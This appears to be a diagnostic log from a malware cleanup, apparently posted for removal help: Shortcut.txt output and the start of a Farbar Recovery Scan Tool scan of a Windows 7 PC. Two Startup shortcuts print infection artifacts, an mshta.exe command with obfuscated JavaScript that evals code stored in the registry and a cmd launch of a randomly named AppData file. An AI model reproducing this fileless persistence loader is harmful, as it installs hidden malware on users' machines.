Shortcut: C:\Users\Public\Desktop\Steam.lnk -> D:\games\Steam.exe (Valve Corporation)
Shortcut: C:\Users\Public\Desktop\World of Warcraft.lnk -> D:\World of Warcraft\World of Warcraft Launcher.exe (Blizzard Entertainment)
Shortcut: C:\Users\Public\Desktop\XSplit Broadcaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Broadcaster\XSplit.Core.exe (SplitMediaLabs)
Shortcut: C:\Users\Public\Desktop\XSplit Gamecaster.lnk -> D:\Program Files (x86)\SplitmediaLabs\XSplit Gamecaster\XSplit.Gamecaster.exe (SplitmediaLabs)
 
 
 
 
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.DefaultPrograms
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk -> C:\Windows\System32\wuapp.exe (Microsoft Corporation) -> startmenu
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office15\FIRSTRUN.EXE (Microsoft Corporation) -> /OEM
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk -> C:\Program Files\Windows Sidebar\sidebar.exe (Microsoft Corporation) -> /showgadgets
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\3D Vision preview pack 1.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /show
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\Disable 3D Vision.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /disable
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation\3D Vision\Enable 3D Vision.lnk -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvstlink.exe (NVIDIA Corporation) -> /enable
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Backup and Restore Center.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.BackupAndRestore
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Calendar.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> calendar
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Contacts.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> contacts
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Find My iPhone.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> find
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Keynote.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> keynote
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Mail.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> mail
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Notes.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> notes
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Numbers.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> numbers
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Pages.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> pages
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud\Reminders.lnk -> C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudWeb.exe (Apple Inc.) -> reminders
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\DW WLAN\DW WLAN Card Utility.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> shell32.dll,,Control_RunDLL C:\Windows\system32\bcmwlcpl.CPL
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox.lnk -> C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) -> /home
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\Dell Notifications.lnk -> C:\Program Files\Dell\Dell Foundation Services\ShellHelper.exe (Dell) -> /FromShortcut
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell\SupportAssist\SupportAssist.lnk -> C:\Program Files\Dell\SupportAssist\pcdlauncher.exe (PC-Doctor, Inc.) -> -lloc dsc
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Computer Management.lnk -> C:\Windows\System32\compmgmt.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Event Viewer.lnk -> C:\Windows\System32\eventvwr.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Performance Monitor.lnk -> C:\Windows\System32\perfmon.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Security Configuration Management.lnk -> C:\Windows\System32\secpol.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Windows PowerShell Modules.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (Microsoft Corporation) -> -NoExit -ImportSystemModules
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Mobility Center.lnk -> C:\Windows\System32\mblctr.exe (Microsoft Corporation) -> /open
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Welcome Center.lnk -> C:\Windows\System32\rundll32.exe (Microsoft Corporation) -> %SystemRoot%\system32\OobeFldr.dll,ShowWelcomeCenter LaunchedBy_StartMenuShortcut
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Resource Monitor.lnk -> C:\Windows\System32\perfmon.exe (Microsoft Corporation) -> /res
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Task Scheduler.lnk -> C:\Windows\System32\taskschd.msc () -> /s
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Speech Recognition.lnk -> C:\Windows\Speech\Common\sapisvr.exe (Microsoft Corporation) -> -SpeechUX
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.EaseOfAccessCenter
ShortcutWithArgument: C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Owner\Desktop\Discord.lnk -> C:\Users\Owner\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe
ShortcutWithArgument: C:\Users\Owner\Desktop\Dropbox.lnk -> C:\Program Files (x86)\Dropbox\Client\Dropbox.exe (Dropbox, Inc.) -> /home
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\385b6.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation) -> "javascript:CKS2wI="jfeb5ohb";TB0=new ActiveXObject("WScript.Shell");u3zJmwRL="gDj1bM";cIhP8=TB0.RegRead("HKCU\\software\\bykshfet\\noce");G7E1Wrjo="YFJO";eval(cIhP8);C2tiiv4T="yYep6F6";"
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4d3bf.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation) -> /C start "" "C:\Users\Owner\AppData\Roaming\8f902\c6d2f.9a4d38"
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc\Discord.lnk -> C:\Users\Owner\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) ->  -extoff
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk -> C:\Windows\System32\control.exe (Microsoft Corporation) -> /name Microsoft.EaseOfAccessCenter
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk -> C:\Windows\System32\WFS.exe (Microsoft Corporation) -> /SendTo
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\SendTo\Skype.lnk -> C:\Program Files (x86)\Skype\Phone\Skype.exe (Skype Technologies S.A.) -> /sendto:
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Discord.lnk -> C:\Users\Owner\AppData\Local\Discord\Update.exe (GitHub) -> --processStart Discord.exe
ShortcutWithArgument: C:\Users\Owner\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Media Player.lnk -> C:\Program Files (x86)\Windows Media Player\wmplayer.exe (Microsoft Corporation) -> /prefetch:1
 
 
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam Support Center.url -> URL: hxxp://support.steampowered.com/
InternetURL: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox\Dropbox Website.URL -> 
InternetURL: C:\Users\Owner\Favorites\Links for United States\GobiernoUSA.gov.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=129792
InternetURL: C:\Users\Owner\Favorites\Links for United States\USA.gov.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=129791
InternetURL: C:\Users\Owner\Favorites\Links\Suggested Sites.url -> URL: hxxps://ieonline.microsoft.com/#ieslice
InternetURL: C:\Users\Owner\Favorites\Links\Web Slice Gallery.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=121315
InternetURL: C:\Users\Owner\Favorites\Dell\Dell Auction.url -> URL: hxxp://www.dellauction.com/
InternetURL: C:\Users\Owner\Favorites\Dell\Dell.url -> URL: hxxp://www.dell.com/
InternetURL: C:\Users\Owner\Favorites\Dell\Support.Dell.Com.url -> URL: hxxp://www.dell.com/support/home
InternetURL: C:\Users\Owner\Desktop\Borderlands 2.url -> URL: steam://rungameid/49520
InternetURL: C:\Users\Owner\Desktop\Dino D-Day.url -> URL: steam://rungameid/70000
InternetURL: C:\Users\Owner\Desktop\Goat Simulator.url -> URL: steam://rungameid/265930
InternetURL: C:\Users\Owner\Desktop\Orcs Must Die! Unchained.url -> URL: steam://rungameid/427270
InternetURL: C:\Users\Owner\Desktop\Ostrich Island.url -> URL: steam://rungameid/337270
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Links for United States\GobiernoUSA.gov.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=129792
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Links for United States\USA.gov.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=129791
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Links\Web Slice Gallery.url -> URL: hxxp://go.microsoft.com/fwlink/?LinkId=121315
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Dell\Dell Auction.url -> URL: hxxp://www.dellauction.com/
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Dell\Dell.url -> URL: hxxp://www.dell.com/
InternetURL: C:\Users\Owner\Desktop\Melissa\Melissa Grover\Favorites\Dell\Support.Dell.Com.url -> URL: hxxp://www.dell.com/support/home
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Borderlands 2.url -> URL: steam://rungameid/49520
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Dead by Daylight BETA.url -> URL: steam://rungameid/471230
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Dino D-Day.url -> URL: steam://rungameid/70000
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Goat Simulator.url -> URL: steam://rungameid/265930
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Orcs Must Die! Unchained.url -> URL: steam://rungameid/427270
InternetURL: C:\Users\Owner\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam\Ostrich Island.url -> URL: steam://rungameid/337270
 
==================== End of Shortcut.txt =============================
 
FRST:
 
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08-01-2017
Ran by Owner (08-01-2017 16:12:42)
Running from C:\Users\Owner\Downloads
Windows 7 Professional Service Pack 1 (X64) (2016-01-30 01:19:55)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1863785947-2063213224-1850305329-500 - Administrator - Disabled)
Guest (S-1-5-21-1863785947-2063213224-1850305329-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1863785947-2063213224-1850305329-1002 - Limited - Enabled)
Owner (S-1-5-21-1863785947-2063213224-1850305329-1000 - Administrator - Enabled) => C:\Users\Owner
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Avast Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe After Effects CC 2014 (HKLM-x32\...\{2B22C750-5C3B-4738-B621-BA786AC7A494}) (Version: 13.2.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Flash Player 24 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Fuse CC (Preview) (HKLM-x32\...\{06F1F289-ACFE-43A2-A654-7950079D6685}) (Version: 1.0 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015.3 (HKLM-x32\...\ILST_20_1_0) (Version: 20.1.0 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.7 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_4_0) (Version: 10.4.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015.5 (HKLM-x32\...\PHSP_17_0_1) (Version: 17.0.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.17)  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.17 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader Driver  (HKLM-x32\...\InstallShield_{E9D8E2D2-4928-437D-ADC6-2EFA7B678FC3}) (Version: 18.5.1844.33907 - Alcor Micro Corp.)
Alcor Micro USB Card Reader Driver  (x32 Version: 18.5.1844.33907 - Alcor Micro Corp.) Hidden
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{D079CAAD-0C31-47A2-9AF5-A82F9CD9B221}) (Version: 5.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{64E6007B-1DA9-42CD-BBE4-D5FA67A7C71D}) (Version: 5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 12.3.2280 - AVAST Software)
Blender (HKLM\...\{47A0EA10-D506-4473-AE99-5E07DD1062DE}) (Version: 2.77.1 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Borderlands 2 (HKLM\...\Steam App 49520) (Version:  - Gearbox Software)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Dead by Daylight: BETA (HKLM\...\Steam App 471230) (Version:  - )
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.0.66 - Dell Inc.)
Dell Data Vault (Version: 4.3.9.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F127834}) (Version: 3.4.15000.0 - Dell Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.61 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{27130E51-9555-408B-8134-7BFF54EDE27B}) (Version: 1.3.0.72 - Dell)
Dell System Detect (HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\58d94f3ce2c27db0) (Version: 6.12.0.5 - Dell)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dino D-Day (HKLM-x32\...\Steam App 70000) (Version:  - 800 North and Digital Ranch)
Discord (HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Discord) (Version: 0.0.296 - Hammer & Chisel, Inc.)
Dropbox (HKLM-x32\...\Dropbox) (Version: 16.4.30 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
DW WLAN Card Utility (HKLM\...\DW WLAN Card Utility) (Version: 6.30.223.262 - Dell Inc.)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
ERUNT 1.1j (HKLM-x32\...\ERUNT_is1) (Version:  - Lars Hederer)
FINAL FANTASY XIV - A Realm Reborn (HKLM-x32\...\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}) (Version: 1.0.0000 - SQUARE ENIX CO., LTD.)
Goat Simulator (HKLM-x32\...\Steam App 265930) (Version:  - Coffee Stain Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.21.169 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.5.0.1165 - Citrix Systems, Inc.)
Heroes of the Storm (HKLM-x32\...\Heroes of the Storm) (Version:  - Blizzard Entertainment)
iCloud (HKLM\...\{4BB313CE-D3D1-424C-8823-15CF85B00B05}) (Version: 6.1.0.30 - Apple Inc.)
Intel® Chipset Device Software (x32 Version: 10.1.1.13 - Intel® Corporation) Hidden
Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1167 - Intel Corporation)
Intel® Network Connections 20.2.3001.0 (HKLM\...\PROSetDX) (Version: 20.2.3001.0 - Intel)
Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.0.1081 - Intel Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 4.0.0.36 - Intel Corporation)
iTunes (HKLM\...\{81C96689-EA5B-4B7D-A04F-16326EC51BC2}) (Version: 12.5.4.42 - Apple Inc.)
Logitech Webcam Software (HKLM-x32\...\{D40EB009-0499-459c-A8AF-C9C110766215}) (Version: 2.51 - Logitech Inc.)
Malwarebytes version 3.0.5.1299 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.5.1299 - Malwarebytes)
Maxx Audio Installer (x64) (Version: 2.6.6073.1 - Waves Audio Ltd.) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4693.1005 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
NVIDIA 3D Vision Controller Driver 364.44 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 364.44 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 368.81 - NVIDIA Corporation)
NVIDIA GeForce Experience 2.11.4.0 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 2.11.4.0 - NVIDIA Corporation)
NVIDIA Graphics Driver 368.81 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 368.81 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.34.15 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.15 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.16.0318 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.16.0318 - NVIDIA Corporation)
Orcs Must Die! Unchained (HKLM\...\Steam App 427270) (Version:  - Robot Entertainment)
Ostrich Island (HKLM-x32\...\Steam App 337270) (Version:  - MeDungeon Ltd.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Realtek USB Audio (HKLM-x32\...\{0A46A65D-89AC-464C-8026-3CD44960BD04}) (Version: 6.3.9600.41 - Realtek Semiconductor Corp.)
SafeZone Stable 1.48.2066.44 (x32 Version: 1.48.2066.44 - Avast Software) Hidden
SafeZone Stable 1.51.2220.62 (x32 Version: 1.51.2220.62 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0280 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 2.11.4.0 - NVIDIA Corporation) Hidden
Skype™ 7.30 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.30.105 - Skype Technologies S.A.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Vulkan Run Time Libraries 1.0.11.1 (HKLM\...\VulkanRT1.0.11.1) (Version: 1.0.11.1 - LunarG, Inc.)
Wacom Tablet (HKLM\...\Wacom Tablet Driver) (Version: 6.3.16-2 - Wacom Technology Corp.)
WebTablet FB Plugin 32 bit (HKLM-x32\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WebTablet FB Plugin 64 bit (HKLM\...\Wacom WebTabletPlugin for Internet Explorer and Netscape) (Version: 2.1.0.7 - Wacom Technology Corp.)
WIDCOMM Bluetooth Software (HKLM\...\{A1439D4F-FD46-47F2-A1D3-FEE097C29A09}) (Version: 6.5.1.6650 - Broadcom Corporation)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
XSplit Broadcaster (HKLM-x32\...\{4366B373-1578-43E9-8FC9-3C5D6D529314}) (Version: 2.8.1607.1936 - SplitmediaLabs)
XSplit Gamecaster (HKLM-x32\...\{D3C9DBAA-5395-4971-A962-553C7DBEA423}) (Version: 2.8.1605.2355 - SplitmediaLabs)
 
